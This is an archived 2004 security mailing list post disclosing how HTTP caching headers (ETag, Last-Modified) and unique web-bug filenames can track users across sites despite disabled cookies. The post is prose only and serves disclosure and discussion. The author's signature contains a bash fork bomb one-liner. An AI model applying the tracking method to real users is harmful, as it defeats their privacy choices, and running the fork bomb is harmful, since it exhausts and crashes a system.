lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040119221146.X93922@dekadens.coredump.cx>
From: lcamtuf at ghettot.org (Michal Zalewski)
Subject: a method for bypassing cookie restrictions in web browsers

Hey,

I noticed that in a typical web browser, it is possible to bypass a
privacy settings that restrict cookies or disable them altogether. This
effectively enables remote entities to track users or otherwise violate
their privacy by storing a unique, persistent portion of information on
the victim's system. The information stored this way can be only retrieved
by the entity who generated it in the first place, but by inserting shared
design elements into web pages on different servers (banners, web bugs,
etc), it is possible to track the victim across domains.

The attack abuses the fundamental design of caching and cache refreshing
as used in HTTP. In the most trivial scenario, the attacker sends a unique
identifier in ETag or Last-Modified headers returned for a web page (or
some other resource) the victim requested. The page, along with this
metadata, will be cached by the browser.

For as long as the document lives in the cache (which is generally only
dropped if the cache size is exceeded - and default configuration is often
generous - or if the user chooses to manually purge it), all attempts to
revisit this page or fetch this particular resource will be accompanied
with an appropriate If-None-Matches or If-Modified-Since header. This is
done so that the server may return "304 Not Modified" if the file had not
changed since the cached fetch, thus preventing the browser from reloading
its contents.

Both headers can be however, if initially chosen to be unique for every
new session encountered by the server, also used to distinguish and track
revisiting users. In this regard, this mechanism is very similar to
cookies. Moreover, if it is not desirable or difficult to generate unique
Last-Modified or ETag headers, it is also possible to encode a specific
dynamically generated unique web bug (such as custid-12874897.jpg) in a
page that the server indicates had not been modified for a very long time;
since the page appears to be old, the browser will not update it, and will
proceed on checking for last modifications on the web bug itself, using
the ID previously provided within the main page.

This appears to be an efficient and quite reliable substitute for cookies.
There seems to be no easy way to disable this mechanism (short of
completely disabling or severily impairing document caching in general,
which often causes a considerable performance impact and increased
bandwidth costs).

The mechanism may fail if a page is not revisited for a very long time
(and is removed from the cache), but will work exceptionally well for
resources that are fetched quite regularly (think banner providers).

Using caching proxies may mitigate the risk (I wouldn't jump the gun and
claim it renders the technique entirely useless, though), but then it is
possible to bypass many proxies by using https web bugs.

Any thoughts? Is the technique something new?

-- 
------------------------- bash$ :(){ :|:&};: --
 Michal Zalewski * [http://lcamtuf.coredump.cx]
    Did you know that clones never use mirrors?
--------------------------- 2004-01-19 22:11 --

   http://lcamtuf.coredump.cx/photo/current/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ